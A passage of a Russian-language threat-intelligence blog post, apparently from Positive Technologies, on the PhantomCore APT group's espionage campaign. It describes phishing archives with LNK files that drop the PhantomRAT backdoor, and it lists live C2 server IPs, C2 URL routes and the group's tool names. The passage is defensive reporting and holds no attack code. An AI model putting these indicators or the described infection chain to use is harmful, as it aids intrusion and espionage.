{"id":473472,"date":"2025-09-02T16:37:14","date_gmt":"2025-09-02T16:37:14","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=473472"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=473472","title":{"rendered":"<span>\u0424\u0430\u043d\u0442\u043e\u043c\u043d\u044b\u0435 \u0431\u043e\u043b\u0438. \u041c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430 \u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0439 \u0440\u0430\u0441\u043a\u043e\u043b APT-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore<\/span>"},"content":{"rendered":"<div><!--[--><!--]--><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c5d\/a1b\/16c\/c5da1b16c8a96ef5a8aa041ace3745a9.png\" width=\"936\" height=\"528\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/c5d\/a1b\/16c\/c5da1b16c8a96ef5a8aa041ace3745a9.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c5d\/a1b\/16c\/c5da1b16c8a96ef5a8aa041ace3745a9.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0412\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u00a0\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0435 PhantomCore \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0432\u00a0\u043d\u0430\u0447\u0430\u043b\u0435 2024\u00a0\u0433\u043e\u0434\u0430. \u0417\u0430\u00a0\u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0438\u0435 \u043f\u043e\u043b\u0442\u043e\u0440\u0430 \u0433\u043e\u0434\u0430 \u043e\u043d\u0430 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043d\u0430\u0440\u0430\u0441\u0442\u0438\u043b\u0430 \u043d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b, \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u0432 \u0435\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438, \u0438 \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0430\u0441\u044c \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0430\u00a0\u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0437\u043d\u0430\u0447\u0438\u043c\u0443\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0420\u043e\u0441\u0441\u0438\u0438 \u0441\u00a0\u0446\u0435\u043b\u044c\u044e \u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430.<\/p>\n<p>\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u0438\u0437\u0430, \u043d\u0430\u043a\u043e\u043f\u043b\u0435\u043d\u043d\u0430\u044f \u043d\u0430\u043c\u0438 \u0432\u00a0\u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0438 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u043b\u0438 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 PhantomCore \u043d\u0435\u0432\u0437\u0438\u0440\u0430\u044f \u043d\u0430\u00a0\u044d\u0432\u043e\u043b\u044e\u0446\u0438\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432. \u041f\u0440\u0438\u043d\u044f\u0442\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u0432\u00a0\u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0430\u044f \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u043d\u043e\u0432\u0443\u044e \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u0443\u044e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430 \u0432\u00a0\u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439.<\/p>\n<p>\u0412\u00a0\u0440\u0430\u043c\u043a\u0430\u0445 \u0435\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043a\u043b\u044e\u0447\u0435\u0432\u0443\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 PhantomCore, \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b, \u0432\u00a0\u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u00a0\u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0432\u0448\u0438\u0435\u0441\u044f \u043e\u0431\u0440\u0430\u0437\u0446\u044b \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438, \u0438\u0437\u0443\u0447\u0438\u0442\u044c TTP \u0438 kill chain \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u00a0\u0436\u0435\u0440\u0442\u0432 \u0438\u0437\u00a0\u0447\u0438\u0441\u043b\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439, \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0441\u0435\u0442\u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043b\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u043d\u0435\u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0445 \u0441\u043e\u0431\u044b\u0442\u0438\u0439.<\/p>\n<h2>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438<\/h2>\n<p>\u0412\u00a0\u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0430\u044f \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u0433\u043e\u0434\u0430 \u043d\u0430\u0448\u0430 \u0433\u0440\u0443\u043f\u043f\u0430 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 TI\u2011\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043d\u043e\u0433\u043e \u0446\u0435\u043d\u0442\u0440\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Positive Technologies (PT ESC TI) \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 RAT\u2011\u0442\u0440\u043e\u044f\u043d\u043e\u0432, \u0443\u043f\u0430\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u043f\u0435\u043d\u0441\u043e\u0440\u0441\u043d\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u044b UPX (the Ultimate Packer for eXecutables) \u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0432\u0448\u0438\u0445\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0443 \u043f\u043e\u00a0\u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u0435 \u043f\u043e\u0434\u00a0\u0432\u0438\u0434\u043e\u043c ZIP\u2011\u0430\u0440\u0445\u0438\u0432\u043e\u0432, \u0432\u00a0\u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0445 \u043f\u0430\u0440\u043e\u043b\u0435\u043c, \u0441\u00a0\u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c \u00ab\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b_\u043d\u0430_\u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u0438\u0435\u00bb.<\/p>\n<p>\u0417\u0430\u043f\u0443\u0441\u043a \u0438\u043d\u043a\u0430\u043f\u0441\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e LNK\u2011\u0444\u0430\u0439\u043b\u0430 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b \u043a\u00a0\u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044e PDF\u2011\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u2011\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0438, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u043a\u00a0\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0435, \u0438\u043d\u0441\u0442\u0430\u043b\u043b\u044f\u0446\u0438\u0438 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0443 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 PhantomRAT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u043b\u0441\u044f \u0441\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 195.58.54[.]39.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/086\/a73\/e39\/086a73e39da5f5f9c242a992b8c3d454.png\" alt=\"PDF \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0430 \" title=\"PDF \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0430 \" width=\"919\" height=\"957\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/086\/a73\/e39\/086a73e39da5f5f9c242a992b8c3d454.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/086\/a73\/e39\/086a73e39da5f5f9c242a992b8c3d454.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>PDF \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u2011\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0430 <\/figcaption><\/div>\n<\/figure>\n<p>\u0414\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0435 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 PhantomCore \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e \u0446\u0435\u043b\u0438\u043a\u043e\u043c \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0438\u0442\u044c \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430, \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u00a0\u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Positive Technologies \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u043a\u0438\u0431\u0435\u0440\u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u044b \u0432\u00a0\u0441\u0435\u0442\u044f\u0445 \u043d\u0430\u0448\u0438\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043e\u00a0\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0441\u0435\u0442\u0435\u0439.<\/p>\n<h2>\u0410\u043d\u0430\u043b\u0438\u0437 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b<\/h2>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0441\u0435\u0442\u0435\u0432\u0430\u044f \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore \u0441\u0442\u0440\u043e\u0433\u043e \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043f\u043e\u00a0\u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0443 \u0438 \u043a\u043b\u0430\u0441\u0441\u0430\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u043e\u043d\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 (\u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432\u00a0\u2014 \u0432\u00a0\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435).<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/669\/c42\/f24\/669c42f24ff7e4d5504607a688881bb9.png\" alt=\"\u0421\u0435\u0442\u0435\u0432\u0430\u044f \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore (\ud83d\udd17 \u0436\u043c\u0438, \u0447\u0442\u043e\u0431\u044b \u0441\u043a\u0430\u0447\u0430\u0442\u044c)\" title=\"\u0421\u0435\u0442\u0435\u0432\u0430\u044f \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore (\ud83d\udd17 \u0436\u043c\u0438, \u0447\u0442\u043e\u0431\u044b \u0441\u043a\u0430\u0447\u0430\u0442\u044c)\" width=\"1920\" height=\"1086\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/669\/c42\/f24\/669c42f24ff7e4d5504607a688881bb9.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/669\/c42\/f24\/669c42f24ff7e4d5504607a688881bb9.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption><a href=\"https:\/\/static.ptsecurity.com\/analytics-and-esc\/phantom-pains\/network-infrastructure.png\" rel=\"noopener noreferrer nofollow\">\u0421\u0435\u0442\u0435\u0432\u0430\u044f \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore<\/a> (\ud83d\udd17 \u0436\u043c\u0438, \u0447\u0442\u043e\u0431\u044b \u0441\u043a\u0430\u0447\u0430\u0442\u044c)<\/figcaption><\/div>\n<\/figure>\n<ol>\n<li>\n<p>C2-\u0441\u0435\u0440\u0432\u0435\u0440 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 PhantomRAT<\/p>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0430\u00a0\u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0430\u0434\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438\u00a0\u2014 \u043f\u0440\u0438\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (Initial Access). \u041f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0431\u0430\u0437\u043e\u0432\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u00a0\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430\u00a0\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0441\u00a0payload\u2011\u0445\u0430\u0431\u043e\u0432 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0441\u0442\u0435\u0439\u0434\u0436\u0435\u0439: PhantomTaskShell, PhantomProxyLite, MeshAgent, RSocx.<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 URL\u2011\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u044b:<\/p>\n<ul>\n<li>\n<p>\/connect\u00a0\u2014 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f<\/p>\n<\/li>\n<li>\n<p>\/init\u00a0\u2014 \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435<\/p>\n<\/li>\n<li>\n<p>\/check\u00a0\u2014 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f<\/p>\n<\/li>\n<li>\n<p>\/command\u00a0\u2014 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0434\u043b\u044f\u00a0\u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435<\/p>\n<\/li>\n<li>\n<p>\/out\u00a0\u2014 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/p>\n<\/li>\n<\/ul>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440:<\/p>\n<p><code>195.58.54.39<\/code><\/p>\n<\/li>\n<li>\n<p>C2-\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0431\u044d\u043a\u0434\u043e\u0440\u0430 PhantomRShell<\/p>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0430\u0434\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438\u00a0\u2014 \u043f\u0440\u0438\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (Initial Access). \u0424\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u0430 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c \u0431\u044d\u043a\u0434\u043e\u0440\u0430 PhantomRAT: \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u043a\u043e\u043c\u0430\u043d\u0434 \u043d\u0430\u00a0\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0441\u00a0payload\u2011\u0445\u0430\u0431\u043e\u0432 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0441\u0442\u0435\u0439\u0434\u0436\u0435\u0439: PhantomTaskShell, PhantomProxyLite, MeshAgent, RSocx.<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 URL\u2011\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u044b:<\/p>\n<ul>\n<li>\n<p>\/poll\u00a0\u2014 \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435 \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b:<\/p>\n<\/li>\n<li>\n<p>\/result\u00a0\u2014 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/p>\n<\/li>\n<\/ul>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b:<\/p>\n<p><code>188.127.254.44<\/code><\/p>\n<p><code>91.239.148.21<\/code><\/p>\n<p><code>185.225.17.104<\/code><\/p>\n<\/li>\n<li>\n<p><strong> <\/strong>Payload\u2011\u0445\u0430\u0431\u044b<\/p>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0441\u0442\u0430\u0434\u0438\u044f\u0445 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u0434\u043b\u044f\u00a0\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0439 \u0445\u043e\u0441\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0430:<\/p>\n<ul>\n<li>\n<p>\u0431\u044d\u043a\u0434\u043e\u0440 PhantomTaskShell<\/p>\n<\/li>\n<li>\n<p>\u0431\u044d\u043a\u0434\u043e\u0440 PhantomProxyLite<\/p>\n<\/li>\n<li>\n<p>\u0441\u0442\u0438\u043b\u0435\u0440 PhantomStealer<\/p>\n<\/li>\n<li>\n<p>\u0443\u0442\u0438\u043b\u0438\u0442\u0430 MeshAgent<\/p>\n<\/li>\n<li>\n<p>\u0443\u0442\u0438\u043b\u0438\u0442\u0430 RSocx<\/p>\n<\/li>\n<li>\n<p>\u0443\u0442\u0438\u043b\u0438\u0442\u0430 